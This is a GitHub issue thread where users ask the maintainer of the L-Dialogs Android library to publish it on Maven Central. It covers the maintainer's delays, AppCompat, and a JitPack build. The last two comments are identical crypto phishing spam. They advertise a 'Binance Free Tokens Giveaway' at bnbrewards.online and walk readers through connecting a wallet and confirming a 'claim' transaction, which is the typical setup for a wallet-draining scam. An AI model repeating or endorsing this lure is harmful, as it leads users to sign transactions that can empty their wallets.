### ISSUE TITLE
Add to maven central

### ISSUE THREAD

**Issue by rfermontero** [lewisjdeane/L-Dialogs#9]
Can you add the library to maven central?its more easy to integrate in the app, than download the aar ..etc.
Thanks

**Comment by lewisjdeane** [comment]
Yeah this is something I've begun working on, should be set up by the end of the week.

**Comment by broakenmedia** [comment]
Any news?

**Comment by lewisjdeane** [comment]
It's being worked on, I have limited time at the moment.

**Comment by meoyawn** [comment]
@lewisjdeane try bintray http://blog.bintray.com/2014/02/11/bintray-as-pain-free-gateway-to-maven-central/

**Comment by jpshelley** [comment]
Hows this coming? Need any help?

**Comment by VishalNehra** [comment]
Waiting patiently...

**Comment by ChrisMCMine** [comment]
+1

**Comment by lewisjdeane** [comment]
Sorry I've just started university and so don't have much free time anymore, I will work on it as and when I can, it's not top priority for me anymore especially since it's not even a necessity, sorry for the reduction in updates I will try and start up again when I have the time.

**Comment by jpshelley** [comment]
Unfortunately with the release of AppCompat-v21 I feel like this library will soon be unneeded. You did a great job though @lewisjdeane

**Comment by afollestad** [comment]
@jpshelley no, AlertDialogs still using Holo theming on pre-Lollipop with AppCompat.

**Comment by ChrisMCMine** [comment]
@afollestad yea but I think we will see an update which provides material themed AlertDialogs really soon, like in the next few weeks.

**Comment by StephaneBg** [comment]
@ChrisMCMine From where did you get that information?

**Comment by jpshelley** [comment]
@StephaneBg @ChrisMCMine From what I've read, they have been updating the app-compat-21 sdk, so be sure to check the package manager often. I'm not sure if we will see this in app-compat-21 exactly, but they have mentioned to be on the lookout for updates and revisions of any kind.

**Comment by vishal1327** [comment]
can any one say pls how to use this library in my project and how to add it?? i dont know because i am new developer
pls..
thanks in advance..

**Comment by jitpack** [comment]
Submitted PR #49 to add Maven plugin. With that it will be possible to use this from https://jitpack.io . Here's a build of our fork: https://jitpack.io/#jitpack/L-Dialogs/1.0

**Comment by p4u1d34n** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by manoharkumarmahto** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
